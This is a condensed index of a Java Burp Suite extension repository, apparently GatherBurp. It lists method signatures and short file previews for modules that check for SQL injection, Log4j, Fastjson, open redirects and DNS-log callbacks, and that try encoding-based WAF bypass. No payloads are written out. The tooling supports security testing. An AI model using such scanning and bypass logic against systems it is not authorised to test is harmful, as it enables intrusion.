method processNewUrl (line 475) | private void processNewUrl(String url) {
method saveUrlToDatabase (line 510) | private void saveUrlToDatabase(String url) {
method handleProjectSelection (line 528) | private void handleProjectSelection(Project project) {
method switchToNewProject (line 553) | private void switchToNewProject(Project project) throws SQLException {
method loadAllProjectData (line 578) | private void loadAllProjectData(int projectId) throws SQLException {
method updateProjectUI (line 669) | private void updateProjectUI(Project project) {
method showDomainConfigWarning (line 680) | private void showDomainConfigWarning() {
method handleProjectSwitchError (line 692) | private void handleProjectSwitchError(Exception e) {
method setupData (line 711) | private void setupData() {
method initializeBlackList (line 726) | private void initializeBlackList() {
method setupCleanupTask (line 750) | private void setupCleanupTask() {
method syncProjectData (line 772) | private void syncProjectData() {
method extractDomains (line 784) | private Set<String> extractDomains(String content) {
method extractUrls (line 813) | private Set<String> extractUrls(String content) {
method isBlacklistedDomain (line 838) | private boolean isBlacklistedDomain(String domain) {
method isValidUrl (line 845) | private boolean isValidUrl(String url) {
method shouldFilter (line 861) | private boolean shouldFilter(String url) {
method getResponseContentType (line 869) | private String getResponseContentType(IResponseInfo responseInfo) {
method isProcessableContentType (line 881) | private boolean isProcessableContentType(String contentType) {
method getIPWithCache (line 894) | private String getIPWithCache(String domain) {
method performDNSResolve (line 914) | private String performDNSResolve(String domain) {
method isDomainRelevant (line 940) | private boolean isDomainRelevant(String domain) {
method isUrlRelevant (line 955) | private boolean isUrlRelevant(String url) {
method cleanupCurrentProject (line 967) | private void cleanupCurrentProject() {
FILE: src/main/java/burp/ui/SocksUI.java
class SocksUI (line 21) | public class SocksUI implements UIHandler {
class ProxyConfig (line 39) | private static class ProxyConfig {
method ProxyConfig (line 45) | public ProxyConfig(String ip, String port, String username, String p...
method init (line 53) | @Override
method setupData (line 59) | private void setupData() {
method setupUI (line 65) | private void setupUI() {
method writeIpPortSettings (line 92) | public void writeIpPortSettings(IBurpExtenderCallbacks callbacks, Prox...
method isEnableSettings (line 165) | public void isEnableSettings(IBurpExtenderCallbacks callbacks, boolean...
method saveSettings (line 190) | public void saveSettings(IBurpExtenderCallbacks callbacks) {
method isConfigFileExist (line 208) | public boolean isConfigFileExist() {
method getPanel (line 213) | @Override
method getTabName (line 300) | @Override
FILE: src/main/java/burp/ui/SqlUI.java
class SqlUI (line 29) | public class SqlUI implements UIHandler, IMessageEditorController, IHttp...
method resetAllCaches (line 77) | public static void resetAllCaches() {
method Check (line 191) | public static void Check(IHttpRequestResponse[] requestResponses, bool...
method findResultByPath (line 658) | private static JsonProcessorUtil.ProcessResult findResultByPath(List<J...
method checkNumberBasedBlind (line 666) | private static void checkNumberBasedBlind(int logid, IParameter para, ...
method checkQuoteBasedBlind (line 685) | private static void checkQuoteBasedBlind(int logid, IParameter para, S...
method checkBlindInjection (line 704) | private static boolean checkBlindInjection(String originalResponse, St...
method checkResponseLength (line 724) | private static boolean checkResponseLength(String originalResponse, St...
method getCleanResponseLength (line 746) | private static int getCleanResponseLength(String response) {
method checkResponseSimilarity (line 786) | private static boolean checkResponseSimilarity(String originalResponse...
method cleanResponseForComparison (line 807) | private static String cleanResponseForComparison(String response) {
method reportBlindInjection (line 832) | private static void reportBlindInjection(int logid, String paraName, S...
method updateUrl (line 844) | public static void updateUrl(int index, String method, String url, int...
method isIntegerParameter (line 855) | private static boolean isIntegerParameter(String value) {
method errSqlCheck (line 876) | private static boolean errSqlCheck(String responseBody) {
method getResponseBody (line 896) | private static String getResponseBody(IHttpRequestResponse requestResp...
method addUrl (line 908) | public static int addUrl(String method, String url, int length, IHttpR...
method addToVulStr (line 921) | public static void addToVulStr(int key, CharSequence value) {
method addPayload (line 927) | public static void addPayload(int selectId, String key, String value, ...
method checkPayload (line 938) | public static IHttpRequestResponse checkPayload(int logid, IParameter ...
method processHttpMessage (line 1015) | @Override
method getHttpService (line 1030) | @Override
method getRequest (line 1035) | @Override
method getResponse (line 1040) | @Override
method init (line 1045) | @Override
method setupData (line 1070) | private void setupData() {
method setupUI (line 1313) | private void setupUI() {
method getPanel (line 1537) | @Override
method getTabName (line 1542) | @Override
class UrlEntry (line 1548) | public static class UrlEntry {
method UrlEntry (line 1556) | UrlEntry(int id, String method, String url, int length, String statu...
class PayloadEntry (line 1567) | public static class PayloadEntry {
method PayloadEntry (line 1578) | PayloadEntry(int selectId, String key, String value, int length, Str...
class UrlModel (line 1592) | static class UrlModel extends AbstractTableModel {
method getRowCount (line 1594) | @Override
method getColumnCount (line 1599) | @Override
method getValueAt (line 1604) | @Override
method getColumnName (line 1622) | @Override
method getColumnClass (line 1640) | @Override
class PayloadModel (line 1650) | static class PayloadModel extends AbstractTableModel {
method getRowCount (line 1652) | @Override
method getColumnCount (line 1657) | @Override
method getValueAt (line 1662) | @Override
method getColumnName (line 1684) | @Override
class URLTable (line 1708) | private class URLTable extends JTable {
method URLTable (line 1709) | public URLTable(AbstractTableModel model) {
method changeSelection (line 1717) | @Override
class PayloadTable (line 1750) | private class PayloadTable extends JTable {
method PayloadTable (line 1751) | public PayloadTable(AbstractTableModel model) {
method changeSelection (line 1758) | @Override
FILE: src/main/java/burp/ui/UIHandler.java
type UIHandler (line 7) | public interface UIHandler {
method init (line 8) | void init();
method getPanel (line 10) | JPanel getPanel(IBurpExtenderCallbacks callbacks);
method getTabName (line 12) | String getTabName();
FILE: src/main/java/burp/ui/UIHepler/GridBagConstraintsHelper.java
class GridBagConstraintsHelper (line 9) | public class GridBagConstraintsHelper extends GridBagConstraints {
method GridBagConstraintsHelper (line 31) | public GridBagConstraintsHelper(int gridx, int gridy) {
method GridBagConstraintsHelper (line 55) | public GridBagConstraintsHelper(int gridx, int gridy, int gridwidth, i...
method setAnchor (line 79) | public GridBagConstraintsHelper setAnchor(int anchor) {
method setFill (line 99) | public GridBagConstraintsHelper setFill(int fill) {
method setWeight (line 121) | public GridBagConstraintsHelper setWeight(double weightx, double weigh...
method setInsets (line 143) | public GridBagConstraintsHelper setInsets(int distance) {
method setInsets (line 169) | public GridBagConstraintsHelper setInsets(int top, int left, int botto...
method setIpad (line 191) | public GridBagConstraintsHelper setIpad(int ipadx, int ipady) {
FILE: src/main/java/burp/ui/UrlRedirectUI.java
class UrlRedirectUI (line 27) | public class UrlRedirectUI implements UIHandler, IMessageEditorControlle...
method init (line 50) | @Override
method setupUI (line 59) | private void setupUI() {
method setupViewers (line 119) | private void setupViewers(JSplitPane viewerSplitPane) {
method generateRedirectPayloads (line 136) | private static List<String> generateRedirectPayloads(String host) {
method setupSettingsPanel (line 165) | private JPanel setupSettingsPanel() {
method createInputPanel (line 202) | private JPanel createInputPanel(String title, DefaultTableModel model,...
method setupData (line 301) | private void setupData() {
method scan (line 314) | public static void scan(IHttpRequestResponse baseRequestResponse) {
method testRedirect (line 342) | private static void testRedirect(IHttpRequestResponse baseRequestRespo...
method getPanel (line 427) | @Override
method getTabName (line 432) | @Override
method getHttpService (line 437) | @Override
method getRequest (line 442) | @Override
method getResponse (line 447) | @Override
method processHttpMessage (line 452) | @Override
class RedirectTable (line 460) | private static class RedirectTable extends JTable {
method RedirectTable (line 461) | public RedirectTable(TableModel model) {
method changeSelection (line 469) | @Override
class RedirectModel (line 486) | private static class RedirectModel extends AbstractTableModel {
method getRowCount (line 490) | @Override
method getColumnCount (line 495) | @Override
method getValueAt (line 500) | @Override
method getColumnName (line 521) | @Override
method getColumnClass (line 526) | @Override
class RedirectEntry (line 535) | private static class RedirectEntry {
method RedirectEntry (line 544) | public RedirectEntry(int id, String method, String url, String param...
FILE: src/main/java/burp/utils/CustomScanIssue.java
class CustomScanIssue (line 13) | public class CustomScanIssue implements IScanIssue {
method CustomScanIssue (line 22) | public CustomScanIssue(IHttpService httpService, URL url, IHttpRequest...
method getUrl (line 32) | @Override
method getIssueName (line 37) | @Override
method getIssueType (line 42) | @Override
method getSeverity (line 47) | @Override
method getConfidence (line 52) | @Override
method getIssueBackground (line 57) | @Override
method getRemediationBackground (line 62) | @Override
method getIssueDetail (line 67) | @Override
method getRemediationDetail (line 72) | @Override
method getHttpMessages (line 77) | @Override
method getHttpService (line 82) | @Override
FILE: src/main/java/burp/utils/DbUtils.java
class DbUtils (line 10) | public class DbUtils {
method getConnection (line 37) | public static Connection getConnection() throws SQLException {
method create (line 42) | public static void create() {
method close (line 175) | public static void close(Connection connection, PreparedStatement prep...
FILE: src/main/java/burp/utils/ExpressionUtils.java
class ExpressionUtils (line 17) | public class ExpressionUtils {
method ExpressionUtils (line 21) | public ExpressionUtils() {
method ExpressionUtils (line 24) | public ExpressionUtils(IHttpRequestResponse baseRequestResponse) {
method getUrl (line 30) | public String getUrl(){
method getCode (line 36) | public int getCode(){
method getHeaders (line 41) | public List<String> getHeaders(){
method getBody (line 46) | public byte[] getBody(){
method getTitle (line 74) | public String getTitle(){
method eq (line 84) | public boolean eq(String key, String value){
method neq (line 113) | public boolean neq(String key, String value){
method process (line 139) | public boolean process(String expression) {
method evaluateExpression (line 145) | private boolean evaluateExpression(String expression) {
method isCompoundExpression (line 165) | private boolean isCompoundExpression(String expression) {
method handleBrackets (line 173) | private boolean handleBrackets(String expression) {
method handleLogicalOperators (line 214) | private boolean handleLogicalOperators(String expression) {
method processSingle (line 237) | private boolean processSingle(String expression) {
FILE: src/main/java/burp/utils/I18nUtils.java
class I18nUtils (line 13) | public class I18nUtils {
type Language (line 15) | public enum Language {
method Language (line 21) | Language(String code) {
method getCode (line 25) | public String getCode() {
method loadLanguageFromConfig (line 456) | private static void loadLanguageFromConfig() {
method getCurrentLanguage (line 471) | public static Language getCurrentLanguage() {
method setLanguage (line 478) | public static void setLanguage(Language language) {
method get (line 485) | public static String get(String key) {
method toggleLanguage (line 493) | public static void toggleLanguage() {
method isChinese (line 500) | public static boolean isChinese() {
method setChinese (line 507) | public static void setChinese(boolean isChinese) {
FILE: src/main/java/burp/utils/JsonProcessorUtil.java
class JsonProcessorUtil (line 42) | public class JsonProcessorUtil {
class ProcessResult (line 45) | public static class ProcessResult {
method ProcessResult (line 49) | public ProcessResult(String paramPath, String modifiedJson) {
method getParamPath (line 54) | public String getParamPath() { return paramPath; }
method getModifiedJson (line 55) | public String getModifiedJson() { return modifiedJson; }
type ProcessMode (line 60) | public enum ProcessMode {
method ProcessMode (line 67) | ProcessMode(int code, String description) {
method getCode (line 72) | public int getCode() {
method getDescription (line 76) | public String getDescription() {
method toBoolean (line 81) | public boolean toBoolean() {
method fromBoolean (line 86) | public static ProcessMode fromBoolean(boolean isDeleteOrigin) {
method process (line 99) | public static List<String> process(Object jsonInput, String payload, b...
method processWithPath (line 104) | public static List<ProcessResult> processWithPath(Object jsonInput, St...
method processArrayWithPath (line 120) | private static void processArrayWithPath(JSONArray array, JSONObject r...
method processJsonObjectWithPath (line 149) | private static void processJsonObjectWithPath(JSONObject currentObject...
method process (line 191) | public static List<String> process(Object jsonInput, String payload, P...
method processBatch (line 208) | public static List<String> processBatch(Object jsonInput, List<String>...
method processBatch (line 220) | public static List<String> processBatch(Object jsonInput, List<String>...
method processWithQuotes (line 236) | public static List<String> processWithQuotes(Object jsonInput, int quo...
method processWithQuotes (line 248) | public static List<String> processWithQuotes(Object jsonInput, int quo...
method processWithQuotesBatch (line 260) | public static List<String> processWithQuotesBatch(Object jsonInput, Li...
method processWithQuotesBatch (line 272) | public static List<String> processWithQuotesBatch(Object jsonInput, Li...
method convertResultsToString (line 283) | private static List<String> convertResultsToString(List<Object> result...
method generateQuotes (line 294) | private static String generateQuotes(int count) {
method processJsonSingle (line 305) | private static List<Object> processJsonSingle(Object jsonData, String ...
method processJsonObject (line 323) | private static void processJsonObject(JSONObject currentObject, JSONOb...
method processArray (line 360) | private static void processArray(JSONArray array, JSONObject root,
method updateValueInPath (line 388) | private static void updateValueInPath(JSONObject root, String path, St...
method getArrayByPath (line 416) | private static JSONArray getArrayByPath(JSONObject root, String path) {
method cloneJsonObject (line 431) | private static JSONObject cloneJsonObject(JSONObject original) {
class JsonProcessingException (line 438) | public static class JsonProcessingException extends RuntimeException {
method JsonProcessingException (line 439) | public JsonProcessingException(String message, Throwable cause) {
method JsonProcessingException (line 443) | public JsonProcessingException(String message) {
FILE: src/main/java/burp/utils/JsonUtils.java
class JsonUtils (line 7) | public class JsonUtils {
method updateJsonObjectFromStr (line 8) | public static List<Object> updateJsonObjectFromStr(Object baseObj, Str...
method replaceUpdate (line 22) | private static Object replaceUpdate(Object obj, String updateStr) {
method appendUpdate (line 55) | private static Object appendUpdate(Object obj, String updateStr) {
method encodeToJsonUnicode (line 89) | private static String encodeToJsonUnicode(String json) {
method encodeToJsonHex (line 125) | private static String encodeToJsonHex(String json) {
method encodeToJsonRandom (line 161) | public static String encodeToJsonRandom(String json) {
method convertToUnicode (line 221) | private static String convertToUnicode(String input) {
method convertToHex (line 230) | private static String convertToHex(String input) {
method main (line 238) | public static void main(String[] args) {
FILE: src/main/java/burp/utils/Nuclei.java
class Nuclei (line 17) | public class Nuclei {
method Generate (line 48) | public static void Generate(IHttpRequestResponse[] iContextMenuInvocat...
method NucleiPost (line 61) | public static String NucleiPost() {
FILE: src/main/java/burp/utils/ResponseSimilarityMatcher.java
class ResponseSimilarityMatcher (line 5) | public class ResponseSimilarityMatcher {
method compareTwoResponses (line 14) | public static boolean compareTwoResponses(String response1, String res...
method compareThreeResponses (line 26) | public static boolean compareThreeResponses(String response1, String r...
method calculateJaccardSimilarity (line 43) | private static double calculateJaccardSimilarity(String str1, String s...
method preprocessResponse (line 66) | private static String preprocessResponse(String response) {
method tokenize (line 97) | private static Set<String> tokenize(String str) {
FILE: src/main/java/burp/utils/RobotInput.java
class RobotInput (line 8) | public class RobotInput extends Robot {
method RobotInput (line 10) | public RobotInput() throws AWTException {
method inputString (line 14) | public void inputString(String str) {
FILE: src/main/java/burp/utils/SmartRequestDetector.java
class SmartRequestDetector (line 15) | public class SmartRequestDetector {
method SmartRequestDetector (line 21) | public SmartRequestDetector(IHttpService httpService) {
method smartSendRequest (line 26) | public IHttpRequestResponse smartSendRequest(String url, byte[] reques...
method tryEncodingBypass (line 44) | private List<IHttpRequestResponse> tryEncodingBypass(String url, byte[...
method urlEncodePath (line 76) | private String urlEncodePath(String path) {
method doubleUrlEncodePath (line 91) | private String doubleUrlEncodePath(String path) {
method unicodeEncodePath (line 105) | private String unicodeEncodePath(String path) {
method mixedEncodePath (line 122) | private String mixedEncodePath(String path) {
method buildUrl (line 141) | private String buildUrl(URL urlObj, String path, String query, String ...
method sendRequest (line 163) | private IHttpRequestResponse sendRequest(String url, byte[] request) {
method isSuccessResponse (line 172) | private boolean isSuccessResponse(IHttpRequestResponse response) {
method isBlockedResponse (line 181) | private boolean isBlockedResponse(IHttpRequestResponse response) {
FILE: src/main/java/burp/utils/UrlCacheUtil.java
class UrlCacheUtil (line 16) | public class UrlCacheUtil {
method checkUrlUnique (line 23) | public static boolean checkUrlUnique(String moduleName, String method,...
method buildUrlHash (line 45) | private static String buildUrlHash(String method, URL url, List<IParam...
method simpleHash (line 81) | private static String simpleHash(String input) {
method normalizePath (line 92) | private static String normalizePath(String path) {
method resetCache (line 109) | public static void resetCache(String moduleName) {
method resetAllCaches (line 119) | public static void resetAllCaches() {
method getCacheSize (line 126) | public static int getCacheSize(String moduleName) {
FILE: src/main/java/burp/utils/Utils.java
class Utils (line 22) | public final class Utils {
method writeReqFile (line 52) | public static String writeReqFile(IHttpRequestResponse message) {
method SocksConfigFile (line 66) | public static File SocksConfigFile(String filename) {
method readString (line 73) | public static String readString(File file, String charset) {
method writeString (line 89) | public static boolean writeString(String content, File file, String ch...
method writeBytes (line 103) | public static boolean writeBytes(byte[] data, File file) {
method deleteReqFile (line 124) | public static boolean deleteReqFile() {
method isUrlBlackListSuffix (line 144) | public static boolean isUrlBlackListSuffix(String url) {
method getUrlWithoutFilename (line 158) | public static String getUrlWithoutFilename(URL url) {
method getUrlRootPath (line 179) | public static String getUrlRootPath(URL url) {
method extractTitle (line 189) | public static String extractTitle(String responseBody) {
method ReplaceChar (line 214) | public static String ReplaceChar(String input) {
method RemoveQuotes (line 221) | public static String RemoveQuotes(String input) {
method UrlEncode (line 231) | public static String UrlEncode(String input) {
method Utf8Encode (line 242) | public static String Utf8Encode(String input) {
method getCurrentTime (line 251) | public static String getCurrentTime() {
method createParentDirs (line 261) | private static void createParentDirs(File file) {
method getSuffix (line 271) | private static Set<String> getSuffix() {
method Utils (line 285) | private Utils() {
method isMatchDomainName (line 300) | public static boolean isMatchDomainName(String targetDomain, List<Stri...
method cleanDomainName (line 345) | private static String cleanDomainName(String domain) {
method isWildcardMatch (line 358) | private static boolean isWildcardMatch(String reversedTarget, String r...
method adjustArray (line 384) | private static String[] adjustArray(String[] array, int targetLength) {
method generateDnsPayload (line 401) | public static String generateDnsPayload(URL targetUrl, String dnslog) {
method sanitizeDnsPayload (line 427) | private static String sanitizeDnsPayload(String payload) {
Condensed preview — 78 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (613K chars).
[
{
"path": ".gitignore",
"chars": 490,
"preview": "target/\n!.mvn/wrapper/maven-wrapper.jar\n!**/src/main/**/target/\n!**/src/test/**/target/\n\n### IntelliJ IDEA ###\n.idea/mod"
},
{
"path": ".idea/.gitignore",
"chars": 239,
"preview": "# Default ignored files\n/shelf/\n/workspace.xml\n# Editor-based HTTP Client requests\n/httpRequests/\n# Datasource local sto"
},
{
"path": ".idea/MarsCodeWorkspaceAppSettings.xml",
"chars": 274,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"com.codeverse.userSettings.MarscodeWorks"
},
{
"path": ".idea/encodings.xml",
"chars": 261,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"Encoding\">\n <file url=\"file://$PROJEC"
},
{
"path": ".idea/misc.xml",
"chars": 715,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ASMSmaliIdeaPluginConfiguration\">\n <a"
},
{
"path": ".idea/runConfigurations.xml",
"chars": 337,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"RunConfigurationProducerService\">\n <o"
},
{
"path": ".idea/uiDesigner.xml",
"chars": 8973,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"Palette2\">\n <group name=\"Swing\">\n "
},
{
"path": ".idea/vcs.xml",
"chars": 167,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"VcsDirectoryMappings\">\n <mapping dire"
},
{
"path": "README.md",
"chars": 4034,
"preview": "# GatherBurp\n\n<div align=\"center\">\n\n\n\n[![License](https://img.shields.io/github/licens"
},
{
"path": "pom.xml",
"chars": 2903,
"preview": "<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLoc"
},
{
"path": "src/main/java/burp/BurpExtender.java",
"chars": 7751,
"preview": "package burp;\n\nimport burp.bean.ConfigBean;\nimport burp.menu.*;\nimport burp.ui.MainUI;\nimport burp.utils.RobotInput;\nimp"
},
{
"path": "src/main/java/burp/bean/AuthBean.java",
"chars": 738,
"preview": "package burp.bean;\n\npublic class AuthBean {\n private String method;\n private String path;\n private String heade"
},
{
"path": "src/main/java/burp/bean/ConfigBean.java",
"chars": 868,
"preview": "package burp.bean;\n\npublic class ConfigBean {\n private Integer id;\n private String module;\n private String type"
},
{
"path": "src/main/java/burp/bean/FastjsonBean.java",
"chars": 660,
"preview": "package burp.bean;\n\npublic class FastjsonBean {\n private Integer id;\n private String type;\n private String valu"
},
{
"path": "src/main/java/burp/bean/Log4jBean.java",
"chars": 796,
"preview": "package burp.bean;\n\npublic class Log4jBean {\n private Integer id;\n private String type;\n private String value;\n"
},
{
"path": "src/main/java/burp/bean/NucleiBean.java",
"chars": 2067,
"preview": "package burp.bean;\n\npublic class NucleiBean {\n private String id;\n private String name;\n private String author;"
},
{
"path": "src/main/java/burp/bean/PermBean.java",
"chars": 686,
"preview": "package burp.bean;\n\n/**\n * @Author Xm17\n * @Date 2024-06-22 10:47\n */\npublic class PermBean {\n private int id;\n pr"
},
{
"path": "src/main/java/burp/bean/RouteBean.java",
"chars": 1085,
"preview": "package burp.bean;\n\npublic class RouteBean {\n private int id;\n private int enable;\n private String name;\n pr"
},
{
"path": "src/main/java/burp/bean/SimilarDomainConfigBean.java",
"chars": 926,
"preview": "package burp.bean;\n\npublic class SimilarDomainConfigBean {\n private int id;\n private int projectId;\n private St"
},
{
"path": "src/main/java/burp/bean/SimilarDomainResultBean.java",
"chars": 1100,
"preview": "package burp.bean;\n\npublic class SimilarDomainResultBean {\n private int id;\n private int projectId;\n private St"
},
{
"path": "src/main/java/burp/bean/SimilarProjectBean.java",
"chars": 659,
"preview": "package burp.bean;\n\npublic class SimilarProjectBean {\n private int id;\n private String name;\n private String cr"
},
{
"path": "src/main/java/burp/bean/SimilarUrlResultBean.java",
"chars": 887,
"preview": "package burp.bean;\n\npublic class SimilarUrlResultBean {\n private int id;\n private int projectId;\n private Strin"
},
{
"path": "src/main/java/burp/bean/SqlBean.java",
"chars": 633,
"preview": "package burp.bean;\n\npublic class SqlBean {\n private int id;\n private String type;\n private String value;\n\n p"
},
{
"path": "src/main/java/burp/dao/ConfigDao.java",
"chars": 5280,
"preview": "package burp.dao;\n\nimport burp.bean.ConfigBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Con"
},
{
"path": "src/main/java/burp/dao/FastjsonDao.java",
"chars": 1442,
"preview": "package burp.dao;\n\nimport burp.bean.FastjsonBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.C"
},
{
"path": "src/main/java/burp/dao/Log4jDao.java",
"chars": 4502,
"preview": "package burp.dao;\n\nimport burp.bean.Log4jBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Conn"
},
{
"path": "src/main/java/burp/dao/PermDao.java",
"chars": 4533,
"preview": "package burp.dao;\n\nimport burp.bean.PermBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Conne"
},
{
"path": "src/main/java/burp/dao/RouteDao.java",
"chars": 4905,
"preview": "package burp.dao;\n\nimport burp.bean.RouteBean;\nimport burp.bean.SqlBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Ut"
},
{
"path": "src/main/java/burp/dao/SimilarDomainConfigDao.java",
"chars": 3406,
"preview": "package burp.dao;\n\nimport burp.bean.*;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\n"
},
{
"path": "src/main/java/burp/dao/SimilarDomainResultDao.java",
"chars": 5130,
"preview": "package burp.dao;\n\nimport burp.bean.SimilarDomainResultBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport"
},
{
"path": "src/main/java/burp/dao/SimilarProjectDao.java",
"chars": 2424,
"preview": "package burp.dao;\n\nimport burp.bean.*;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\n"
},
{
"path": "src/main/java/burp/dao/SimilarUrlResultDao.java",
"chars": 4362,
"preview": "package burp.dao;\n\n\nimport burp.bean.SimilarUrlResultBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport j"
},
{
"path": "src/main/java/burp/dao/SqlDao.java",
"chars": 5185,
"preview": "package burp.dao;\n\nimport burp.bean.SqlBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connec"
},
{
"path": "src/main/java/burp/menu/AuthMenu.java",
"chars": 713,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.AuthUI;\n\nimport javax.swing.*;\nimport java.awt.even"
},
{
"path": "src/main/java/burp/menu/FastjsonMenu.java",
"chars": 2503,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.FastjsonUI;\n\nimport javax.swing.*;\nimport java.awt."
},
{
"path": "src/main/java/burp/menu/Log4jMenu.java",
"chars": 717,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.Log4jUI;\n\nimport javax.swing.*;\nimport java.awt.eve"
},
{
"path": "src/main/java/burp/menu/NucleiMenu.java",
"chars": 722,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.utils.Nuclei;\n\nimport javax.swing.*;\nimport java.awt.e"
},
{
"path": "src/main/java/burp/menu/PermMenu.java",
"chars": 712,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.PermUI;\n\nimport javax.swing.*;\nimport java.awt.even"
},
{
"path": "src/main/java/burp/menu/RouteMenu.java",
"chars": 740,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.AuthUI;\nimport burp.ui.RouteUI;\n\nimport javax.swing"
},
{
"path": "src/main/java/burp/menu/SqlMenu.java",
"chars": 707,
"preview": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.SqlUI;\n\nimport javax.swing.*;\nimport java.awt.event"
},
{
"path": "src/main/java/burp/menu/TextProcessMenu.java",
"chars": 9147,
"preview": "package burp.menu;\n\nimport burp.IContextMenuInvocation;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\nimport java.awt."
},
{
"path": "src/main/java/burp/ui/AuthUI.java",
"chars": 17287,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.AuthBean;\nimport burp.utils.I18nUtils;\nimport burp.utils.Utils;\n\nimpor"
},
{
"path": "src/main/java/burp/ui/ConfigUI.java",
"chars": 17423,
"preview": "package burp.ui;\n\nimport burp.IBurpExtenderCallbacks;\nimport burp.bean.ConfigBean;\nimport burp.utils.I18nUtils;\nimport b"
},
{
"path": "src/main/java/burp/ui/FastjsonUI.java",
"chars": 23571,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.FastjsonBean;\nimport burp.utils.CustomScanIssue;\nimport burp.utils.I18"
},
{
"path": "src/main/java/burp/ui/Log4jUI.java",
"chars": 36565,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.Log4jBean;\nimport burp.ui.UIHepler.GridBagConstraintsHelper;\nimport bu"
},
{
"path": "src/main/java/burp/ui/MainUI.java",
"chars": 1658,
"preview": "package burp.ui;\n\nimport burp.IBurpExtenderCallbacks;\nimport burp.ITab;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\n"
},
{
"path": "src/main/java/burp/ui/PermUI.java",
"chars": 33054,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.PermBean;\nimport burp.ui.UIHepler.GridBagConstraintsHelper;\nimport bur"
},
{
"path": "src/main/java/burp/ui/RouteUI.java",
"chars": 27579,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.RouteBean;\nimport burp.utils.CustomScanIssue;\nimport burp.utils.Expres"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/CacheManager.java",
"chars": 4926,
"preview": "package burp.ui.SimilarHelper;\n\n\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.Map;\nimport java.u"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/TableRenderer.java",
"chars": 1782,
"preview": "package burp.ui.SimilarHelper;\n\nimport javax.swing.*;\nimport javax.swing.table.DefaultTableCellRenderer;\nimport java.awt"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/ThreadManager.java",
"chars": 2211,
"preview": "package burp.ui.SimilarHelper;\n\n\nimport burp.utils.Utils;\n\nimport java.util.concurrent.*;\nimport java.util.concurrent.at"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/bean/Domain.java",
"chars": 1684,
"preview": "package burp.ui.SimilarHelper.bean;\n\nimport burp.bean.SimilarDomainResultBean;\n\nimport java.text.SimpleDateFormat;\nimpor"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/bean/Project.java",
"chars": 1503,
"preview": "package burp.ui.SimilarHelper.bean;\n\nimport burp.bean.SimilarProjectBean;\nimport burp.dao.SimilarDomainConfigDao;\n\nimpor"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/bean/URL.java",
"chars": 596,
"preview": "package burp.ui.SimilarHelper.bean;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\n\npublic class URL {\n p"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/dialog/DomainConfigDialog.java",
"chars": 5588,
"preview": "package burp.ui.SimilarHelper.dialog;\n\nimport burp.ui.SimilarHelper.bean.Project;\nimport burp.utils.I18nUtils;\n\nimport j"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/dialog/ProjectManageDialog.java",
"chars": 5482,
"preview": "package burp.ui.SimilarHelper.dialog;\n\nimport burp.bean.SimilarProjectBean;\nimport burp.dao.SimilarProjectDao;\nimport bu"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/table/DomainTable.java",
"chars": 7841,
"preview": "package burp.ui.SimilarHelper.table;\n\nimport burp.ui.SimilarHelper.tablemodel.TableModel;\nimport burp.ui.SimilarHelper.T"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/table/URLTable.java",
"chars": 7200,
"preview": "package burp.ui.SimilarHelper.table;\n\nimport burp.ui.SimilarHelper.tablemodel.TableModel;\nimport burp.ui.SimilarHelper.T"
},
{
"path": "src/main/java/burp/ui/SimilarHelper/tablemodel/TableModel.java",
"chars": 3905,
"preview": "package burp.ui.SimilarHelper.tablemodel;\n\nimport javax.swing.table.AbstractTableModel;\nimport java.util.*;\nimport java."
},
{
"path": "src/main/java/burp/ui/SimilarUI.java",
"chars": 29975,
